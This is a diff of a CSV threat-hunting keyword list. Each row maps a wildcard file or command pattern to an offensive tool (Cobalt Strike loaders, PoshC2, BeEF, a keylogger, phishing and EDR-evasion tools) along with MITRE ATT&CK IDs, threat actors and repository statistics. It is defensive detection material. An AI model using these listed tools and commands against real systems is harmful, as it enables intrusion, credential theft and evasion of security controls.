TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*XML-External-Entity-(XXE)-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*xor.exe *.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*xor.py *.dll*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" @@ -18530,36 +18718,36 @@ "*xor_payload*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*xor-bin.py *.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*xoreaxeaxeax*","offensive_tool_keyword","Github Username","github username hosting obfuscation and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xoreaxeaxeax","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*XorEncoder.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*XOR-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*XorEncoder.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*XOR-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*xpipe \\*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe*lsass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpn*ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" -"*xrdp.c*","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1076 - T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","4820","2704","2023-10-02T15:48:32Z","2011-04-25T14:31:17Z" +"*xrdp.c*","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1076 - T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","4824","2704","2023-10-02T15:48:32Z","2011-04-25T14:31:17Z" "*xs.exe -connect *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*xscreensaver_log_priv_esc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*xshell_xftp_password.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*xscreensaver_log_priv_esc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*xshell_xftp_password.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*XSpear -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*xspy -display*","offensive_tool_keyword","xspy -display","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","1","22","15","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z" "*xsrfprobe -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*xsser -u * -g */login?password=* --Coo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*XSS-labs*","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Web Attacks","https://github.com/paralax/xss-labs","1","1","N/A","N/A","1","50","26","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z" "*XSS-Payloads*","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*xssrays.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssrays.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssrays_spec.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssraysdetail.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssraysscan.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*XSStrike*","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12018","1823","2023-08-05T13:49:45Z","2017-06-26T07:24:44Z" +"*xssrays.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssrays.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssrays_spec.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssraysdetail.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssraysscan.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*XSStrike*","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12024","1823","2023-08-05T13:49:45Z","2017-06-26T07:24:44Z" "*XXEinjector*","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Web Attacks","https://github.com/enjoiz/XXEinjector","1","1","N/A","N/A","10","1363","311","2020-08-27T12:33:26Z","2015-05-16T10:56:14Z" -"*xxePayloads.ini*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*XX-PHISHING-LINK-XX*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" -"*X-YSOSERIAL-NET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*xxePayloads.ini*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*XX-PHISHING-LINK-XX*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*X-YSOSERIAL-NET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Y29iYWx0c3RyaWtl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 